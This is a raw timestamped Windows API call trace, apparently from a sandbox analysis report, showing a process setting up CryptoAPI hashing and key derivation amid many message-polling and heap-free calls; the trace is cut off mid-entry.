0x10 [0186.530] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0186.530] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.530] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0186.531] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.531] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.531] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0186.531] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.531] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.531] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.531] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.531] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.531] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0186.531] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.531] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0186.533] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.533] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.533] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0186.533] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.533] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.533] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.533] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.533] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.533] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0186.533] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.533] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.533] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.540] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.540] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.540] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.540] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0186.540] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.540] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.540] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0186.540] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.540] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.540] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0186.540] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.540] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.540] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0186.540] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.540] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.541] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.541] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.541] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.541] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.541] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.541] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0186.541] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.541] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.541] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0186.541] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.541] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.541] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.541] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.541] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0186.541] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.541] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.541] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.542] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.542] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.542] CryptHashData (hHash=0x90af58, pbData=0x8def38, dwDataLen=0x19, dwFlags=0x1) returned 1 [0186.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0186.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0186.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0186.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0186.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0186.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0186.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0186.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0186.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0186.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0186.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0186.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0186.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0186.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0186.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0186.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0186.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0186.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0186.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0186.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0186.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0186.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0186.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0186.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0186.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0186.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0186.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0186.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0186.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0186.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0186.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0186.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0186.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0186.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0186.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0186.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0186.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0186.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0186.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0186.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0186.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0186.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0186.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0186.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0186.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0186.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0186.544] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0186.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0186.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0186.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0186.545] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0186.545] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.545] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.545] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0186.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0186.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.545] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0186.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0186.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.545] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0186.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0186.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0186.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0186.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.546] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0186.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0186.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0186.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0186.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0186.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0186.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0186.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0186.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0186.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0186.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0186.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0186.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0186.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0186.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0186.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0186.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0186.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0186.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x9bd4e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0186.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0186.548] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDeriveKey") returned 0x74f63188 [0186.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0186.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0186.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0186.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0186.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0186.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0186.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: 